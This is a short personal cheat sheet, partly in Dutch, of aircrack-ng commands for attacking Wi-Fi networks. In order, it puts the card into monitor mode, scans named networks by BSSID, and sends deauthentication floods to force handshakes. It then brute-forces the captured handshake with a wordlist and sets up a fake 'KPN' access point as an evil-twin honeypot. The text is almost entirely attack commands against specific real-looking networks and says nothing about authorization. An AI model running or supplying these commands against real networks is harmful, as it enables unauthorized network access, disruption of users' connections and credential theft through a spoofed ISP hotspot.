Wifi hacking
# Monitor mode
airmon-ng start wlan0
# Wifi scanner
airodump-ng wlan0mon
airodump-ng -c 3 -w “mr pancake” wlan0mon –bssid 84:9C:A6:79:29:A8
airodump-ng -c 6 -w “wiskeyswifi” wlan0mon –bssid 74:D2:1D:86:9B:BE
# Capture de handshake – in een 2e terminal
aireplay-ng -0 0 wlan0mon -e Derar
# andere methode om te laten handshaken volgens Udemy cursus
aireplay-ng –deauth 4 -a {BSSID} -c {client mac} wlan0mon
# brute force met wachtwoordbestand
aircrack-ng joep-02.cap -w ../wb/names.txt
Wifi Honeypot fake Wifi
airbase-ng –essid “KPN” -c 2 wlan1mon